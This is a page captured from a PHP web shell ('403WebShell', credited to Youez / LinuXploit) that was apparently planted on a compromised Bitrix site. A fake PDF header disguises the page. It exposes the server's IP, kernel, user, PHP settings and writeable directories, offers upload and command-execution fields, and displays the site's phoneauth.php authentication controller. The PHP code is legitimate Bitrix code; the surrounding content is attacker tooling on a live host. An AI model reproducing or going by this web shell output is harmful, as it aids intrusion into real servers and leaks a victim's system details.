%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.144.102.138
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/controller/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/controller/phoneauth.php
<?php
/**
 * Bitrix Framework
 * @package bitrix
 * @subpackage main
 * @copyright 2001-2018 Bitrix
 */
namespace Bitrix\Main\Controller;

use Bitrix\Main;
use Bitrix\Main\Component;
use Bitrix\Main\Localization\Loc;

class PhoneAuth extends Main\Engine\Controller
{
	const SIGNATURE_SALT = 'phone_auth_sms';

	public function resendCodeAction($signedData)
	{
		if(($params = static::extractData($signedData)) === false)
		{
			$this->addError(new Main\Error(Loc::getMessage("main_register_incorrect_request"), "ERR_SIGNATURE"));
			return null;
		}
		if($params["phoneNumber"] == '')
		{
			$this->addError(new Main\Error(Loc::getMessage("main_register_incorrect_request"), "ERR_PARAMS"));
			return null;
		}
		if($params["smsTemplate"] == '')
		{
			$params["smsTemplate"] = "SMS_USER_CONFIRM_NUMBER";
		}

		$result = \CUser::SendPhoneCode($params["phoneNumber"], $params["smsTemplate"]);

		if(!$result->isSuccess())
		{
			$this->addErrors($result->getErrors());
			return null;
		}

		return [
			'DATA_SIGN' => static::signData([
				'phoneNumber' => $params["phoneNumber"],
				'smsTemplate' => $params["smsTemplate"]
			]),
			'DATE_SEND' => \CUser::PHONE_CODE_RESEND_INTERVAL,
		];
	}

	public function confirmAction($code, $signedData)
	{
		global $USER;

		try
		{
			$signer = new Main\Security\Sign\Signer();
			$userId = $signer->unsign($signedData, static::SIGNATURE_SALT);
		}
		catch(\Bitrix\Main\SystemException $exception)
		{
			$this->addError(new Main\Error(Loc::getMessage('main_register_incorrect_request'), 'ERR_SIGNATURE'));
			return null;
		}

		if(!preg_match('/^[0-9]{6}$/', $code))
		{
			$this->addError(new Main\Error(Loc::getMessage('main_err_confirm_code_format'), 'ERR_CONFIRM_CODE'));
			return null;
		}

		$phoneRecord = Main\UserPhoneAuthTable::getList([
			'filter' => [
				'=USER_ID' => $userId
			],
			'select' => ['USER_ID', 'PHONE_NUMBER', 'USER.ID', 'USER.ACTIVE'],
		])->fetchObject();

		if(!$phoneRecord)
		{
			$this->addError(new Main\Error(Loc::getMessage('main_register_no_user'), 'ERR_NOT_FOUND'));
			return null;
		}

		if(\CUser::VerifyPhoneCode($phoneRecord->getPhoneNumber(), $code))
		{
			if($phoneRecord->getUser()->getActive() && !$USER->IsAuthorized())
			{
				$USER->Authorize($userId);
			}

			return true;
		}
		else
		{
			$this->addError(new Main\Error(Loc::getMessage('main_err_confirm'), 'ERR_CONFIRM_CODE'));
			return null;
		}
	}

	public function configureActions()
	{
		return [
			'resendCode' => [
				'-prefilters' => [
					Main\Engine\ActionFilter\Authentication::class,
				],
			],
			'confirm' => [
				'-prefilters' => [
					Main\Engine\ActionFilter\Authentication::class,
				],
			],
		];
	}

	/**
	 * Converts the array of values to the signed string.
	 * @param array $data Data to sign.
	 * @return string
	 */
	public static function signData(array $data)
	{
		return Component\ParameterSigner::signParameters(self::SIGNATURE_SALT, $data);
	}

	/**
	 * Converts the signed string to the array of values.
	 * @param string $signedData
	 * @return bool|array
	 */
	public static function extractData($signedData)
	{
		try
		{
			return Component\ParameterSigner::unsignParameters(self::SIGNATURE_SALT, $signedData);
		}
		catch(Main\SystemException $exception)
		{
			return false;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit